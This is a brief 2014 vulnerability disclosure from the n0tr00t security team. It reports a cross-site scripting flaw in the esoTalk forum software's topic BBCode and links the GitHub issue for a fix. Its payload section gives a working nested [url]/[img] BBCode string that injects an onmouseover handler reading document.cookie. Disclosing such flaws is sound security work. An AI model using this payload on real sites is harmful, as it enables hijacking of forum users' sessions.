~# n0tr00t Security Team

Esotalk topic xss vulnerability

01 Nov 2014 - evi1m0

[+] Author: evi1m0
[+] Team: n0tr00t security team 
[+] From: http://www.n0tr00t.com
[+] Create: 2014-11-01

0x01 about

esoTalk是一款国外拥有众多优势的免费,开源的基于PHP和MySQL下的网页应用。 她的设计极为简介,速度极快,超轻量级别并且有良好的可拓展性。

0x02 payload

[url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#"aaaaaa[/img]]evi1m0[/url]

0x03 proof

0x04 fix

issue[ https://github.com/esotalk/esoTalk/issues/377 ]

Waiting to update